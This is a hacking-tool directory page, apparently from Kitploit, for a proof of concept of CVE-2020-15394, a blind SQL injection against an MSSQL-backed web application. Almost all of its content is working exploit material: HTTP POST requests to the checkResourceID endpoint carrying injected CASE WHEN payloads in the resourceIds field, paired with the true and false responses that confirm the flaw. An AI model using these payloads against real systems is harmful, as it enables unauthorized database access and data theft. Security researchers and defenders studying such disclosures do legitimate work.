Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-15394-PoC — PoC CVE | Kitploit
Tools/GitHubGitHub/trungtin1998/cve-2020-15394-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtrungtin1998/cve-2020-15394-poc

CVE-2020-15394-PoC

PoC CVE

View Repository
6 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-15394

  • DBMS: MSSQL
  • TRUE condition in sql query
root@kitploit:~
POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=1)+THEN+1+ELSE+1/0+END)=1--
root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID_APM_80=123; Path=/; Secure; HttpOnly
Content-Type: text/plain;charset=UTF-8
Content-Length: 57
Date: Wed, 24 Nov 2021 09:39:56 GMT

1) AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 1/0 END)=1--
  • FALSE condition in sql query
root@kitploit:~
POST /AppManager/json/ApmAdminServices/checkResourceID HTTP/1.1
Host: redacted.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

resourceIds=1)+AND+(SELECT+CASE+WHEN+(1=0)+THEN+1+ELSE+1/0+END)=1--
root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID_APM_80=123; Path=/; Secure; HttpOnly
Content-Type: text/plain;charset=UTF-8
Content-Length: 2
Date: Wed, 24 Nov 2021 09:44:04 GMT

Download Tool